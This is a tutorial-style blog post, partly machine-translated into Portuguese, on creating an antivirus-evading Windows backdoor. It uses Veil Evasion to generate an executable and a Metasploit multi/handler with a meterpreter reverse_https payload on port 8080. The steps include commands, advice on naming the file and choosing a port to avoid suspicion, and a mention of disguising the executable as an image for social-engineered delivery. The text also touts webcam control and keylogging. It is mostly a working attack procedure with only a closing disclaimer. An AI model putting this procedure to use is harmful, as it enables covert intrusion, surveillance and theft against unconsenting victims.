Como criei um backdoor indetectável para Windows — Ethical Hacking
O que é um Backdoor?
Backdoor é um método de obter secretamente acesso remoto a um computador, ignorando a autenticação normal e o firewall da máquina.
Neste blog, escreverei sobre Como criei um backdoor para minha máquina Windows que nem o antivírus conseguiu detectar. Depois de criar o backdoor, consegui fazer muitas coisas na máquina Windows remotamente, como controlar a webcam, tirar screenshots, usar keyloggers, etc. Vamos começar.
Eu criei o executável (arquivo .exe) no meu arquivo Ubuntu machine
. Este .exe
arquivo, quando executado em uma máquina Windows, criou um backdoor para minha máquina Ubuntu de onde eu pude controlar tudo na máquina Windows.
Vejamos os passos que precisam ser seguidos.
1. Instalando o Véu
Como primeiro passo, precisamos instalar o Veil. Para instalar o Veil você pode acessar este linkhttps://www.javatpoint.com/installing-veil. Também exigirá a instalação do framework metasploitable para usuários do Ubuntu (não necessário para Kali), que pode ser baixado aqui:https://www.darkoperator.com/installing-metasploit-in-ubunt.
Uma vez instalado, você pode começar digitando apenas veil
. (ou você pode executá-lo digitando ./Veil.py
no diretório veil
está instalado). A concha do véu será aberta como mostrado abaixo:
2. Usando Evasão no Véu
O framework veil possui 2 ferramentas ( Evasion
e Ordinance
) que podem ser vistas digitando list no veil shell. Estamos interessados em Evasion
, então digitamos
> use 1
Em backdoors é criada uma conexão reversa , ou seja, quando a pessoa-alvo clica duas vezes no script, seu computador iniciará a inicialização do backdoor. Portanto, torna-se indetectável por muitos softwares antivírus porque não há nenhuma máquina externa solicitando a conexão. Eu também usei a porta 8080
que é uma porta comum usada para se conectar a sites, então nada parece suspeito para os softwares antivírus.
Tipo :
> list
> use 15
Para definir o LHOST e LPORT execute:
> set LHOST <your_IP>
> set LPORT 8080
Devemos tentar modificar o arquivo e torná-lo mais exclusivo para que ele ignore o antivírus. Não há nenhuma razão real para eu ter escrito as próximas 2 linhas. É apenas para tornar a assinatura um pouco diferente para contornar o antivírus.
Próximo tipo generate
para gerar o arquivo. Um prompt aparecerá para nomear o backdoor. Eu o nomeei, backdoor_8080
mas você pode nomeá-lo um pouco diferente para que não cause suspeita.
Uma página aparecerá mostrando a localização do executável salvo.
Parabéns!!! o backdoor é gerado. Está armazenado em:var/lib/veil/output/compiled/backdoor_8080.exe
4. Ouvindo conexões de entrada na porta
Ao criar a porta, usei a porta 8080. Então, vou abrir a porta na minha máquina ubuntu para que ela esteja pronta para se conectar quando o computador de destino executar o executável. Para fazer isso eu uso o framework Metasploit. Para executar o console Metasploit, executemsfconsole
$ msfconsole
Para abrir a porta usei um módulo fornecido pelo Metasploit. É chamado multi/handler
. Então eu corro,
> use exploit/multi/handler
Vamos alterar essas configurações para atender às nossas necessidades. Execute os seguintes comandos:
> set PAYLAOD windows/meterpreter/reverse_https
> set LHOST <IP>
> set LPORT 8080
> show options
Digite exploit
para começar a ouvir na porta
> exploit
Existem várias maneiras de engenharia social para entregar o backdoor a um computador de destino. Uma dessas maneiras é descrita no blog abaixo, onde escrevi como criar um trojan. Basicamente, disfarçou o .exe
arquivo em uma imagem em um .jpg
arquivo.
6. Testando o backdoor no Windows
Clicar duas vezes no backdoor_8080.exe
arquivo na máquina Windows executou meu executável.
No Metasploit onde estávamos ouvindo conexões na máquina Ubuntu, podemos ver que o shell do metepreter foi aberto.
O shell meterpreter será parecido com o mostrado acima. Você pode digitar help
para obter uma longa lista de comandos e sua descrição sobre o que você pode fazer.
Uma lista de comandos básicos que você pode executar é
> sysinfo
> ipconfig
> pwd
> shell
If you liked my blog so far, you could Buy Me A Coffee by clicking on the button below or following this link: https://www.buymeacoffee.com/gouravdhar
Summarising Backdoors
While it seems that creating backdoors is something that is wrong and is done only by blackhat hackers, it is not entirely true. Some of the product-based companies also create backdoors into their products so that if their users lose access to their accounts or products the companies can help them gain access. While the above method is a good way to create backdoors, if you want to be on the ethical side of the line, do not use it to gain access to computers you don’t have permission to.
Para obter atualizações sobre tópicos mais interessantes, siga-me aqui . Sinta-se à vontade para comentar e compartilhar suas experiências e pensamentos. Não se esqueça de verificar meu site em https://gourav-dhar.com para mais blogs relacionados à tecnologia.